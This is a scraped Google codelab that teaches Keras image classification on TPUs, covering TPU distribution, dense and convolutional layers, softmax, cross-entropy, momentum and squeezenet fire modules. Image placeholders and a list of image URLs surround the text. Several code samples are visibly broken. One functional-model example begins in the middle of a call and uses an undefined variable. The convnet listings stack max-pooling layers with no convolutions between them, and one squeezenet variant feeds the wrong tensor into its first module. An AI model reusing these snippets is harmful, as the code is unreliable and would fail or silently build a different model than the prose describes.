Here is an example:\n\n``````tpu = tf.contrib.cluster_resolver.TPUClusterResolver(TPU_ADDRESS)\nstrategy = tf.contrib.tpu.TPUDistributionStrategy(tpu)\ntpu_model = tf.contrib.tpu.keras_to_tpu_model(model, strategy=strategy)\n\ntpu_model.fit(get_training_dataset,\nsteps_per_epoch=TRAIN_STEPS, epochs=EPOCHS,\nvalidation_data=get_validation_dataset, validation_steps=VALID_STEPS)``````\n\nIn this code snippet:\n\n• `TPUClusterResolver` finds the TPU on the network. The TPU_ADDRESS argument can be empty (None) on all Google Cloud systems (ML Engine, Kubernetes Engine, Deep Learning VMs). These systems know where their TPU is. In Colaboratory you have to get the TPU address from an environment variable and pass it here yourself - code sample here.\n• `TPUDistributionStrategy` is the part that implements the distribution and the \"all-reduce\" gradient synchronization algorithm.\n• `keras_to_tpu_model` creates a copy of your model ready to train and predict on TPU\n• Please note that the `tpu_model.fit` function expects data inputs as a function that returns a `tf.data.Dataset`, for both the training and validation datasets.\n\n• While there are many ways to load data in a Tensorflow model, for TPUs, the use of the `tf.data.Dataset` API is required.\n• TPUs work best with fixed batch sizes. Please use `tf.data.Dataset.batch(drop_remainder=True)`.\n• Some Tensorflow operations are not supported. The list is here. The good news is that this limitation only applies to training code i.e. the forward and backward pass through your model. You can still use all Tensorflow operations in your data input pipeline as it will be executed on CPU.\n• int8 or int16 numbers are treated as int32. The TPU does not have integer hardware operating on less than 32 bits.\n• `tf.py_func` is not supported on TPU.\n• TPUs are very fast and ingesting data often becomes the bottleneck when running on them. There are tools you can use to detect data bottlenecks and other performance tips in the TPU Performance Guide.\n\n### Using TPUs with Estimator API\n\nPorting an `Estimator` model to the `TPUEstimator` API is more involved but also allows additional flexibility and enables support for TPU pods. The documentation describing the process is here and you can find a commented before/after TPUEstimator porting example here:\n\n•", null, "`TPUEstimator model (MNIST)`\n•", null, "`Original Estimator model for reference`\n\n## In a nutshell\n\nIf all the terms in bold in the next paragraph are already known to you, you can move to the next exercise. If your are just starting in deep learning then welcome, and please read on.\n\nFor models built as a sequence of layers Keras offers the Sequential API. For example, an image classifier using three dense layers can be written in Keras as:\n\n``````model = tf.keras.Sequential([\ntf.keras.layers.Flatten(input_shape=[192, 192, 3]),\ntf.keras.layers.Dense(500, activation=\"relu\"),\ntf.keras.layers.Dense(50, activation=\"relu\"),\ntf.keras.layers.Dense(5, activation='softmax') # classifying into 5 classes\n])\n\n# this configures the training of the model. Keras calls it \"compiling\" the model.\nmodel.compile(\nloss= 'categorical_crossentropy',\nmetrics=['accuracy']) # % of correct answers\n\n# train the model\nmodel.fit(dataset, ... )``````", null, "## Dense neural network\n\nThis is the simplest neural network for classifying images. It is made of \"neurons\" arranged in layers. The first layer processes input data and feeds its outputs into other layers. 
It is called \"dense\" because each neuron is connected to all the neurons in the previous layer.", null, "You can feed an image into such a network by flattening the RGB values of all of its pixels into a long vector and using it as inputs. It is not the best technique for image recognition but we will improve on it later.\n\n## Neurons, activations, RELU\n\nA \"neuron\" computes a weighted sum of all of its inputs, adds a value called \"bias\" and feeds the result through a so called \"activation function\". The weights and bias are unknown at first. They will be initialized at random and \"learned\" by training the neural network on lots of known data.", null, "The most popular activation function is called RELU for Rectified Linear Unit. It is a very simple function as you can see on the graph above.\n\n## Softmax activation\n\nThe network above ends with a 5-neuron layer because we are classifying flowers into 5 categories (rose, tulip, dandelion, daisy, sunflower). Neurons in intermediate layers are activated using the classic RELU activation function. In the last layer though, we want to compute numbers between 0 and 1 representing the probability of this flower being a rose, a tulip and so on. For this, we will use an activation function called \"softmax\".\n\nApplying softmax on a vector is done by taking the exponential of each element and then normalising the vector, typically using the L1 norm (sum of absolute values) so that the values add up to 1 and can be interpreted as probabilities.", null, "", null, "## Cross-entropy loss\n\nNow that our neural network produces predictions from input images, we need to measure how good they are, i.e. the distance between what the network tells us and the correct answers, often called \"labels\". Remember that we have correct labels for all the images in the dataset.\n\nAny distance would work, but for classification problems the so-called \"cross-entropy distance\" is the most effective. We will call this our error or \"loss\" function:", null, "\"Training\" the neural network actually means using training images and labels to adjust weights and biases so as to minimise the cross-entropy loss function. Here is how it works.\n\nThe cross-entropy is a function of weights, biases, pixels of the training image and its known class.\n\nIf we compute the partial derivatives of the cross-entropy relatively to all the weights and all the biases we obtain a \"gradient\", computed for a given image, label, and present value of weights and biases. Remember that we can have millions of weights and biases so computing the gradient sounds like a lot of work. Fortunately, Tensorflow does it for us. The mathematical property of a gradient is that it points \"up\". Since we want to go where the cross-entropy is low, we go in the opposite direction. We update weights and biases by a fraction of the gradient. We then do the same thing again and again using the next batches of training images and labels, in a training loop. Hopefully, this converges to a place where the cross-entropy is minimal although nothing guarantees that this minimum is unique.", null, "## Mini-batching and momentum\n\nYou can compute your gradient on just one example image and update the weights and biases immediately, but doing so on a batch of, for example, 128 images gives a gradient that better represents the constraints imposed by different example images and is therefore likely to converge towards the solution faster. 
The size of the mini-batch is an adjustable parameter.\n\nThis technique, sometimes called \"stochastic gradient descent\" has another, more pragmatic benefit: working with batches also means working with larger matrices and these are usually easier to optimise on GPUs and TPUs.\n\nThe convergence can still be a little chaotic though and it can even stop if the gradient vector is all zeros. Does that mean that we have found a minimum? Not always. A gradient component can be zero on a minimum or a maximum. With a gradient vector with millions of elements, if they are all zeros, the probability that every zero corresponds to a minimum and none of them to a maximum point is pretty small. In a space of many dimensions, saddle points are pretty common and we do not want to stop at them.", null, "Illustration: a saddle point. The gradient is 0 but it is not a minimum in all directions. (Image attribution Wikimedia: By Nicoguaro - Own work, CC BY 3.0)\n\nThe solution is to add some momentum to the optimization algorithm so that it can sail past saddle points without stopping.\n\n## Glossary\n\nbatch or mini-batch: training is always performed on batches of training data and labels. Doing so helps the algorithm converge. The \"batch\" dimension is typically the first dimension of data tensors. For example a tensor of shape [100, 192, 192, 3] contains 100 images of 192x192 pixels with three values per pixel (RGB).\n\ncross-entropy loss: a special loss function often used in classifiers.\n\ndense layer: a layer of neurons where each neuron is connected to all the neurons in the previous layer.\n\nfeatures: the inputs of a neural network are sometimes called \"features\". The art of figuring out which parts of a dataset (or combinations of parts) to feed into a neural network to get good predictions is called \"feature engineering\".\n\nlabels: another name for \"classes\" or correct answers in a supervised classification problem\n\nlearning rate: fraction of the gradient by which weights and biases are updated at each iteration of the training loop.\n\nlogits: the outputs of a layer of neurons before the activation function is applied are called \"logits\". The term comes from the \"logistic function\" a.k.a. the \"sigmoid function\" which used to be the most popular activation function. \"Neuron outputs before logistic function\" was shortened to \"logits\".\n\nloss: the error function comparing neural network outputs to the correct answers\n\nneuron: computes the weighted sum of its inputs, adds a bias and feeds the result through an activation function.\n\none-hot encoding: class 3 out of 5 is encoded as a vector of 5 elements, all zeros except the 3rd one which is 1.\n\nrelu: rectified linear unit. A popular activation function for neurons.\n\nsigmoid: another activation function that used to be popular and is still useful in special cases.\n\nsoftmax: a special activation function that acts on a vector, increases the difference between the largest component and all others, and also normalizes the vector to have a sum of 1 so that it can be interpreted as a vector of probabilities. Used as the last step in classifiers.\n\ntensor: A \"tensor\" is like a matrix but with an arbitrary number of dimensions. A 1-dimensional tensor is a vector. A 2-dimensions tensor is a matrix. And then you can have tensors with 3, 4, 5 or more dimensions.\n\n## In a nutshell\n\nIf all the terms in bold in the next paragraph are already known to you you can move to the next exercise. 
If your are just starting with convolutional neural networks please read on.", null, "Illustration: filtering an image with two successive filters made of 4x4x3=48 learnable weights each.\n\nThis is how a simple convolutional neural network looks in Keras:\n\n``````model = tf.keras.Sequential([\n# input: images of size 192x192x3 pixels (the three stands for RGB channels)\ntf.keras.layers.Conv2D(kernel_size=3, filters=24, padding='same', activation='relu', input_shape=[192, 192, 3]),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.Flatten(),\n# classifying into 5 categories\ntf.keras.layers.Dense(5, activation='softmax')\n])\n\nmodel.compile(\nloss= 'categorical_crossentropy',\nmetrics=['accuracy'])``````", null, "## Convolutional neural nets 101\n\nIn a layer of a convolutional network, one \"neuron\" does a weighted sum of the pixels just above it, across a small region of the image only. It adds a bias and feeds the sum through an activation function, just as a neuron in a regular dense layer would. This operation is then repeated across the entire image using the same weights. Remember that in dense layers, each neuron had its own weights. Here, a single \"patch\" of weights slides across the image in both directions (a \"convolution\"). The output has as many values as there are pixels in the image (some padding is necessary at the edges though). It is a filtering operation, using a filter of 4x4x3=48 weights.\n\nHowever, 48 weights will not be enough. To add more degrees of freedom, we repeat the same operation with a new set of weights. This produces a new set of filter outputs. Let's call it a \"channel\" of outputs by analogy with the R,G,B channels in the input image.", null, "The two (or more) sets of weights can be summed up as one tensor by adding a new dimension. This gives us the generic shape of the weights tensor for a convolutional layer. Since the number of input and output channels are parameters, we can start stacking and chaining convolutional layers.", null, "Illustration: a convolutional neural network transforms \"cubes\" of data into other \"cubes\" of data.\n\n## Strided convolutions, max pooling\n\nBy performing the convolutions with a stride of 2 or 3, we can also shrink the resulting data cube in its horizontal dimensions. There are two common ways of doing this:\n\n• Strided convolution: a sliding filter as above but with a stride >1\n• Max pooling: a sliding window applying the MAX operation (typically on 2x2 patches, repeated every 2 pixels)", null, "Illustration: sliding the computing window by 3 pixels results in fewer output values. Strided convolutions or max pooling (max on a 2x2 window sliding by a stride of 2) are a way of shrinking the data cube in the horizontal dimensions.\n\n## Convolutional classifier\n\nFinally, we attach a classification head by flattening the last data cube and feeding it through a dense, softmax-activated layer. A typical convolutional classifier can look like this:", null, "Illustration: an image classifier using convolutional and softmax layers. It uses 3x3 and 1x1 filters. The maxpool layers take the max of groups of 2x2 data points. 
The classification head is implemented with a dense layer with softmax activation.\n\n## In Keras\n\nThe convolutional stack illustrated above can be written in Keras like this:\n\n``````model = tf.keras.Sequential([\n# input: images of size 192x192x3 pixels (the three stands for RGB channels)\ntf.keras.layers.Conv2D(kernel_size=3, filters=32, padding='same', activation='relu', input_shape=[192, 192, 3]),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.MaxPooling2D(pool_size=2),\ntf.keras.layers.Flatten(),\n# classifying into 5 categories\ntf.keras.layers.Dense(5, activation='softmax')\n])\n\nmodel.compile(\nloss= 'categorical_crossentropy',\nmetrics=['accuracy'])``````\n\nThe padding parameter in convolutional layers can have two values:\n\n• \"same\": pad with zeros so as to produce outputs of the same width/height as the input\n• \"valid\": no padding, only use real pixels\n\n## In a nutshell", null, "Illustration: a convolutional \"module\". What is best at this point ? A max-pool layer followed by a 1x1 convolutional layer or a different combination of layers ? Try them all, concatenate the results and let the network decide. On the right: the \"inception\" convolutional architecture using such modules.\n\nIn Keras, to create models models where the data flow can branch in and out, you have to use the \"functional\" model style. Here is an example:\n\n``````l = tf.keras.layers # syntax shortcut\n\nactivation='relu', input_shape=[192, 192, 3])(x) # x=input image\n\n# module start: branch out\ny1 = l.Conv2D(filters=32, kernel_size=1, padding='same', activation='relu')(y)\ny3 = l.Conv2D(filters=32, kernel_size=3, padding='same', activation='relu')(y)\ny = l.concatenate([y1, y3]) # output now has 64 channels\n# module end: concatenation\n\n# many more layers ...\n\n# Create the model by specifying the input and output tensors.\n# Keras layers track their connections automatically so that's all that's needed.\nz = l.Dense(5, activation='softmax')(y)\nmodel = tf.keras.Model(x, z)``````", null, "## Other cheap tricks\n\n### Small 3x3 filters", null, "In this illustration, you see the result of two consecutive 3x3 filters. Try to trace back which data points contributed to the result: these two consecutive 3x3 filters compute some combination of a 5x5 region. It is not exactly the same combination that a 5x5 filter would compute but it is worth trying because two consecutive 3x3 filters are cheaper than a single 5x5 filter.\n\n### 1x1 convolutions ?", null, "In mathematical terms, a \"1x1\" convolution is a multiplication by a constant, not a very useful concept. In convolutional neural networks however, remember that the filter is applied to a data cube, not just a 2D image. Therefore, a \"1x1\" filter computes a weighted sum of a 1x1 column of data (see illustration) and as you slide it across the data, you will obtain a linear combination of the channels of the input. This is actually useful. If you think of the channels as the results of individual filtering operations, for example a filter for \"pointy ears\", another one for \"whiskers\" and a third one for \"slit eyes\" then a \"1x1\" convolutional layer will be computing multiple possible linear combinations of these features, which might be useful when looking for a \"cat\". On top of that, 1x1 layers use fewer weights.\n\nA simple way of putting these ideas together has been showcased in the \"Squeezenet\" paper. 
The authors suggest a very simple convolutional module design, using only 1x1 and 3x3 convolutional layers.", null, "Illustration: squeezenet architecture based on \"fire modules\". They alternate a 1x1 layer that \"squeezes\" the incoming data in the vertical dimension followed by two parallel 1x1 and 3x3 convolutional layers that \"expand\" the depth of the data again.\n\nContinue in your previous notebook and build a squeezenet-inspired convolutional neural network. You will have to change the model code to the Keras \"functional style\".\n\nHANDS-ON:", null, "`Keras_Flowers_TPU (playground).ipynb`\n\n## Squeezenet architectures to try\n\nIt will be useful for this exercise to define a helper function for a squeezenet module:\n\n``````def fire(x, squeeze, expand):\ny = l.Conv2D(filters=squeeze, kernel_size=1, padding='same', activation='relu')(x)\ny1 = l.Conv2D(filters=expand//2, kernel_size=1, padding='same', activation='relu')(y)\ny3 = l.Conv2D(filters=expand//2, kernel_size=3, padding='same', activation='relu')(y)\nreturn tf.keras.layers.concatenate([y1, y3])\n\n# this is to make it behave similarly to other Keras layers\ndef fire_module(squeeze, expand):\nreturn lambda x: fire(x, squeeze, expand)\n\n# usage:\nx = l.Input(shape=[192, 192, 3])\ny = fire_module(squeeze=24, expand=48)(x) # typically, squeeze is less than expand\ny = fire_module(squeeze=32, expand=64)(y)\n...\nmodel = tf.keras.Model(x, y)\n``````\n\nHere are a couple of architectures you can try:\n\n### Little squeeze: 6 layers, global average pooling\n\n``````x = l.Input(shape=[*IMAGE_SIZE, 3])\n\n# Squeezenet's fire modules alternating with max-pooling layers\ny = fire_module(squeeze=25, expand=50)(x)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=25, expand=50)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=25, expand=50)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# classification head with cheap global average pooling to 50 numbers\n# (each channel is averaged to one number), followed by dense softmax layer.\ny = l.GlobalAveragePooling2D()(y)\ny = l.Dense(5, activation='softmax')(y)``````\n\nThis one is simple but not so great, tops out at 65% accuracy.\n\n### Squeeze-dense: 8 layers, dense classification head\n\n``````x = l.Input(shape=[*IMAGE_SIZE, 3])\n\n# Starting directly with a 3x3 layer instead of the 1x1 layer that starts a fire\n# module. Not sure if doing a 1x1 convolution (=linear combination) of the RGB\n# channels of the input image is useful.\ny = l.Conv2D(kernel_size=3, filters=40, padding='same', activation='relu')(x)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# Alternating max-pooling and fire modules with increasing filter count.\ny = fire_module(squeeze=25, expand=50)(x)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=30, expand=60)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=40, expand=80)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# final 1x1 conv layer to bring the channel count to a reasonable 10 channels\ny = l.Conv2D(kernel_size=1, filters=10, padding='same', activation='relu')(y)\n\n# flatten 24x24x10 data cube to 24x24x10=5760 long vector and end on a fairly large\n# dense layer. Notice that it accounts for half of the weights of the entire network.\ny = l.Flatten()(y)\ny = l.Dense(5, activation='softmax')(y)``````\n\nThis one goes to 75% accuracy. 
For the flowers dataset, a final dense layer seems to be working better than global average pooling.\n\n### Squeeze it as fast as you can: quick downsampling, 6 layers, global average pooling\n\n``````x = l.Input(shape=[*IMAGE_SIZE, 3])\n\n# Are all the 192x192 pixels of the image useful for recognizing flowers ?\n# Let's downsample heavily with a 6x6 filter applied every 2 pixels (output is 96x96)\n# and a max-pooling layer right after (output is now 48x48).\ny = l.Conv2D(kernel_size=6, filters=42, padding='same', activation='relu', strides=2)(x)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# only 4 layers worth of fire modules, let's see if it is enough\ny = fire_module(squeeze=24, expand=60)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\ny = fire_module(squeeze=27, expand=90)(y)\ny = l.MaxPooling2D(pool_size=2)(y)\n\n# Global average pooling by the book: one last conv layer to bring the number of\n# channels down to 5, average them, apply softmax activation on the results directly.\n# No dense layer at all.\ny = l.Conv2D(kernel_size=1, filters=5, padding='same', activation='relu')(y)\ny = l.GlobalAveragePooling2D()(y)\ny = l.Activation('softmax')(y)``````\n\nThis model trains in 3 seconds per epoch on TPU and amazingly, it still achieves 70% accuracy. Downsampling the input image aggressively seems to work for the flowers dataset.\n\n### Squeeze it to 90%\n\nThe convnet from the previous chapter achieved 75% accuracy and transfer learning from the first chapter took us to 85% accuracy. Can you beat them ?\n\nSometimes, you will see training curves like this:", null, "The validation accuracy stalls and the validation loss goes up instead of going down. This is usually called \"overfitting\". It happens when the optimization work that is being done on the training dataset is no longer useful for examples outside of the training dataset. Various regularization techniques such as \"dropout\" or \"batch normalization\" can be used to address this, but this is a topic for another code lab. For now, just restart the training. On the Flowers dataset, the random weights initializations are sufficient to get the network to converge on most runs.\n\n## Solution\n\nHere is the solution notebook. You can use it if you are stuck.", null, "`Keras_Flowers_TPU_squeezenet.ipynb`\n\n## What we've covered\n\n• 🤔 Keras \"functional style\" models\n• 🤓 Squeezenet architecture", null, "", null, "The author: Martin GörnerTwitter: @martin_gorner", null, "www.tensorflow.org" ]
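The codelab above ends by noting that overfitting can be addressed with "dropout" or "batch normalization" but defers that to another lab. Purely as a hedged sketch, and not part of the original codelab, here is one way its fire module could be extended with batch normalization plus a dropout layer before the classification head, in the same Keras functional style; the layer sizes, the dropout rate, and the choice to normalize after each convolution are illustrative assumptions.

```python
import tensorflow as tf

l = tf.keras.layers

def fire_bn(x, squeeze, expand):
    # Squeeze/expand branching as in the codelab's fire module,
    # with batch normalization added after each convolution.
    y = l.Conv2D(filters=squeeze, kernel_size=1, padding='same', activation='relu')(x)
    y = l.BatchNormalization()(y)
    y1 = l.Conv2D(filters=expand // 2, kernel_size=1, padding='same', activation='relu')(y)
    y3 = l.Conv2D(filters=expand // 2, kernel_size=3, padding='same', activation='relu')(y)
    return l.concatenate([l.BatchNormalization()(y1), l.BatchNormalization()(y3)])

x = l.Input(shape=[192, 192, 3])
y = fire_bn(x, squeeze=24, expand=48)
y = l.MaxPooling2D(pool_size=2)(y)
y = fire_bn(y, squeeze=32, expand=64)
y = l.MaxPooling2D(pool_size=2)(y)
y = l.GlobalAveragePooling2D()(y)
y = l.Dropout(0.3)(y)                      # regularization before the classifier
y = l.Dense(5, activation='softmax')(y)

model = tf.keras.Model(x, y)
model.compile(optimizer='adam',
              loss='categorical_crossentropy',
              metrics=['accuracy'])
```

The `keras_to_tpu_model` wrapping shown earlier in the codelab would be applied to a model like this in the same way.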
[ null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/3ac215b2fdd20e74.png", null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/983220a6ead98ce0.png", null, "https://lh4.googleusercontent.com/y9StiIb4MI8CdALd5uUb_hmmii_v1IbYoq-djHkVTByQqTDWfTMi4YN1STs_vswejMHkefgv8wV7E1IjQGZe5iG85InU_J6_BKOEwOj2S9nwYSrop2fHcZm0wPMyrabGN6gPz0LL", null, "https://lh5.googleusercontent.com/EZ0ENVv_luEK_Ihc9XfCkxD-FkWGfcdreuw7j9RDSXObnhlo0Nf15RVtm-4xwIlxfeYO7QxJojU3yvCJHmY0ZIi_YvJxA1U7b2nGfubo6mQPw97dICc8pRouXBz_K9QcHqMvtkAk", null, "https://lh6.googleusercontent.com/SOJ1AG1XNIW-ToNfd6arlYkT-O_oAJRXv1X0AjKl39gfNvDWgIwOCWPMykhx4RtEv7HL8Qt1rVNVnAgsx0sXR7FzGEriweqmLvWf85a-DBoFweQh-QjVLyUosqFBpGqTwZsn0unV", null, "https://lh6.googleusercontent.com/HhbGLjAVVLr_VaFrRa1Duwm1SteFlUW-gcMf4klTKWHdX1I2lBcq1d4ONt5REgPf5O5WQVlsgp1U9mmtG-4_r0NIS_PPRtW2Ngh_l3kQNz4TXnmB3vyfHmWPH7eFhgIGqjvdzl9x", null, "https://lh4.googleusercontent.com/rOVEL6wVS-Jkf3UL7bPavN1l8EPXhjbL3ffQuPvv9eLVpgcTIOlwZXKpEfbNq6q3XeZRAu8wT7G68zOQ1OcP3cDYhHUiacISDMxIc-Zkfjqc_6l5iUiAQoktI9oWInLvUHa-Kbuo", null, "https://lh3.googleusercontent.com/z4mnVe-RfMZgmip6ZzgU3ZjW2F5vcGwurz_dKH2SX8bZfC_Fyk5nQbsCLas2RRb1KvjQ_pURNnIl8YSl8mw3kCFADNA4-Vy-p56srObiEIWjECMEqkecu0gtWwJGgxckY-w_SWEe", null, "https://lh6.googleusercontent.com/eEfP0uj73Ln5e4veygi7m8x4IZCgf8oA6RUgndb0qdLnw1gnAynBkgzLUzXJtRdNLeiyoNLZ2hm9eAbcyxAENxGKzvfNKzoETHbYywf0I3VEHrfJRK3RZZhpY1KDfaaF9eMw5c2l", null, "https://lh3.googleusercontent.com/4xp5DSK_pndOc5oCy8npFaKOK5w7k8W1Cq0g-DEjeHzGQIkqLIxoNLJzHyx1oi5ST2VzGz1m8SB55Qm7Dd76y2eB-R57GRWtUoA2tMx7n19mALxUjV5MA6R9jl-0WQpC7aMuEU36", null, "https://lh6.googleusercontent.com/m2ZNXsswkirhjtpUulhu9Xr8DTAXMSmlEziRrNQTuiqx4HsTDEsRplaC4aioZq7jiRHJFLI_zKMFTZCnGLvkNFxuF5F7iRrEq-YE9hHbObquQMAp56VYOnYs3K0Lat8zY9ZUfG00", null, "https://lh6.googleusercontent.com/CCeZnBe_Z3DfWBk0XX3jsGiix4uSk68AH6GGypFnm-xFjyYsE8bI1y8XhV2bD9VbRFTrIUu66vK57wjMk6KjT6hq41F1LaP8ZvTJDTelB0XjCcvbdvqitbnz8ZKwu2yK7IeWaER-", null, "https://lh5.googleusercontent.com/qerSwSYAQI7Pu_M8JTYdeoalmjU8HjZjLlQ5Lsj3fLpgQkD_2HGSLxs_xkyNm05GCn0djs0nFrVuNFlmZOien7VYNASYT6eWhVxJ-Kj829_hFwrDy6I3V0KamEs1vi8Xvdl0dmxL", null, "https://lh6.googleusercontent.com/5jb9KLw4SN9slhBZJ7Rki8-jShUKw44BwvH5EiCO58-H0oRbgOP7yewRk7VqEGtqHRXWgyP0vNYSmEnKdydcBjscCVgQK11zTgkt-mgXJuocx0LvV8hY23XbP0nDQ0hcfTSUc7Ur", null, "https://lh5.googleusercontent.com/8hqB2Vz99LdF8jZI_SohPDQECcW-npuhPbQfv97Pk5pN-dmN990W6QOHSZyCc6tQzfIEv5FFj6s6paNjMxa4AIoe2iaRt3ctJtW3P8noSV0rhG_8kRGsnnYcQJxB_wQxh7DUXu-S", null, "https://lh6.googleusercontent.com/NL87v6IA4pJi_3THTrupqCkzMCdQIxPXPVkDw1HtXWBF0u_nl0cSpxBk_acuT7E142UaQWIJ4V18pB7OllBt_km61Rk6aTyvbRcsSjciluC2bNZF5ROzWjKAeu187q4Vq0Wq4Agm", null, "https://lh5.googleusercontent.com/NjGqp60oF_3Bu4Q63dprSivZ77BgVnaPEp0Olk1moFm8okcmMfPXs7PIJBgL9LB5QCtqlmM4WTepYxPC5Mq_i_0949sWSpq8pKvfPAkHnFJWuHjrNVLPN2_a0eggOlteV7mZB_Z9", null, "https://lh5.googleusercontent.com/KD6_bklEMVbMIqlWWqATuQt_IjmlR3oxvM-EJsRwWAevvjAI9BiHQ8jkK9cYkV03uXek_6zBzk6fmKC4N2JLzB270SnaX61rDBVXK-nLP4n39LP3N9B_GuuxYJ8RQJCj9OwdhDaf", null, "https://lh5.googleusercontent.com/KD6_bklEMVbMIqlWWqATuQt_IjmlR3oxvM-EJsRwWAevvjAI9BiHQ8jkK9cYkV03uXek_6zBzk6fmKC4N2JLzB270SnaX61rDBVXK-nLP4n39LP3N9B_GuuxYJ8RQJCj9OwdhDaf", null, "https://lh3.googleusercontent.com/VoZ48TJbsPyLLgLPnWfuDbPaxMzj4YI0QCHwu8d3V8GofTOaiqF9EhrA5YN7YefBMT8FaksSSudcpkMKSYqDAD5BRNC3yCFTlN1A3KadhH_wvxULBm6G-LAwX3Lf_6wsgDl8Pjs-", null, 
"https://lh6.googleusercontent.com/eZH8QIod6Ox7rXZHxuFdn8sO1xKwvQijFhbvDJvA3IInuHoLns_jhSnu3IC7Z_zun4hoY0sc7qMtRoo0QoHuvV3b34HmAisP44O2isb0MjXA2G7KcDJAM6zbpsDyiwESvtq33rsw", null, "https://lh5.googleusercontent.com/k6DjuuSf7jENzT5JAisVayQhJCARHalDhKF2fbn4rz2dzC812YuVELqrjEm0ikptxbEY0f9SbjPQibWIBl19xytf-tyE2jKCIrS6Fd2DppNOMOr7sdxivPdX30RRGMaznOy__j84", null, "https://lh4.googleusercontent.com/pKXcGQkdrtOv6Tt3xd9mKdiFMjsBgYl4yJxY1OhKbYeyezyl0OVJqzUkNlzCnhECvT573vlgp4tv6yK0SN24B8NisJx_09eiudk4cY9TsXexvYhz3CPYbm4Luwe7IYkl99nOKZ-X", null, "https://lh6.googleusercontent.com/R9PjsenJH05ZPQ5avjtotPRlEygOMzI-DYQ_w_0iJxZINMOPgDSqZyhTPjI4CoccAUVOTy48xWL-KqRKgy70RA1CQszQCji340OANsQXKmzKKEV2k3Aqzideb45L11MZ4GQnwIBo", null, "https://lh5.googleusercontent.com/lHJ39zJS_bxIUex466f5B0y9KLrfLYsvO3AE4SePRonU9Iu9xzgrUHaSUwiwt2jo7DZNPcZ8KiDz1wdgPKcLWfqSPm4SqpoGXqsCUrQnaKj3kYtWB7rRHoj0HumhIu5vyqzZMUdu", null, "https://lh6.googleusercontent.com/-zJknBe86qyBthLnAR2MvG8gJ16VNFpq48Fxyj1wKEcPsbovQltacyg929AjZp0ar_bbgQvuQ9dj_wMNlowlJENXFATDfYOVS7QikA_i9ZAbHqFgVDYggV7dLCdzTPfMD1xi5fk3", null, "https://lh4.googleusercontent.com/pca1hdZW4x0-ATiV-pOqIthBB3Iev7hL8A_FTD7GPuziWKT75U0SvmXBz8D9iO1t0WqRH9QKZwoVjYIvHm-mNns0W8oT1w4F-M6_zdkAIj6OC7JDLqMmfu9Sj0KNSkPkDndzndnl", null, "https://lh4.googleusercontent.com/YLAIo_FvooqiS6OIJtlhwVbGR33PbTRXMykYADYz_zXlCutsn6znaAuDuIC5FXgUodCiP_SmI9o0k2qJTdheVxiO7hhK9Y2kjCAg7j4r1-lhb0ALGGiZq4gvivViz5k7HtCFITVI", null, "https://lh4.googleusercontent.com/d2ajiE5vZEKGbJYpWCopx22A5c5ZfzCnYz5JhMl0KZeXDQEV1V-fQCHawm05A6IdeMuzTaoYt9NlSy1gRApwKM0jALTqsvGcn4w2zl-WOMdNfNApvuefO7W3O9HUukxQZq81e8PZ", null, "https://lh3.googleusercontent.com/fbiSOeGYh--XzS4WAualpWoeq781TQ-FennJaJEoq5yTi0TK2jElTUpARFhoN7H3bYrUEa7SiLQOARwqZmRa52xxqpJaaD4eXOyU0n5vDgLOc-Zhrx_XCckr1IoUsaMWGN-fmKJ2", null, "https://lh5.googleusercontent.com/-ixE46DvIXGNT5dntsb1X-GLJXNoQtW_tG4UFvE55VLoWQZLBrjKLsrl4a9TeBJLTGbmYS1QaApCV0ArpL6RzXlFKMso3kWdPu7NTyCPjRqBVmX8SbB4M7QvdLuqk_ImlSTU7j_m", null, "https://lh4.googleusercontent.com/VmGHD8fRcDXvPe1HKjfyJ6YAPyIoLUh_871vA-6iDno6VYYPR1EIwwu-ABOjeX5c8kmJ270eMwPAEyQUsnUnQu1cV5Dmfk-DLcSdMx-OlafsYLYSgh7bxAmRas9Md-I2xJ3HI6B0", null, "https://lh3.googleusercontent.com/NzA0J8O-oxh7qrzlRWqp5eMgiph-5P-lTRY112j5VhbQAfYlkV3hBDQ69q7Lxh9u5-3TIdt3usoPTSodLCahIBZ4N2AfDDlF53xHvpOIj3sLzpKRRZNe7H9IuI4eQEsC_mZ9KFwQ", null, "https://lh5.googleusercontent.com/m4eFxPbgMArZoVEwh2m5RtX_zTYwRIJbD9URa_MmMPjBjBuWs8JZ2BHniiPMtKeFq9ohIHAAEo0U270BHOvcR-p9hIIw6cNV4N8fjMd9fuFrqKU3IPb0khvu0G4vOYgaARWhA0pX", null, "https://lh4.googleusercontent.com/LTqGr50OxM34tUiCE5JjznbW4UQMK6DDTPt-hrL3CxLQcNNMYbT2s0I-zgS18wXmn4CJg7yUQSJPeo0i3ZEECx0Tq8S3_C84grWI45aIYezj4CITEGznRKTxuipaHbqC227dNw_n", null, "https://lh6.googleusercontent.com/NYXqkOPmrcBctoxUhx01G7eOEqaIZBXmyW5CM9bxIRZMcpuVlELCG6EvhUO6v3tm_WNInGdbAuJkpJnTy3kuJgqgYMlOohktK-MChzNXbaz4RkEdaVACvRpGKCYhXtWCjJMgt5_E", null, "https://lh4.googleusercontent.com/BtT56u3wVLqY1yNzcNHLOIBSd_GUNBkLJ69efmCwhN3xFPLujGmBqN4DMvCTTjF6o7SDkubHmVRmPnZUCfGTZz7i7dW8R5FGQ1ugKxk_8u0llxBsHgB2c1oX2mqI89bxCmlNwlVr", null, "https://lh4.googleusercontent.com/EY1NLuqJtrOyg5_wp4WGQl6iGwmJJVopA0IlZKgd3MewuCL65uHwBNNR7Ao91aX6x7jSdnRQj4HV3TEeKFsFvbEGrpJfhZ74y_oVlBGobM5h_XGyYtCyv0nfojXsZiKlOvSAibuC", null, 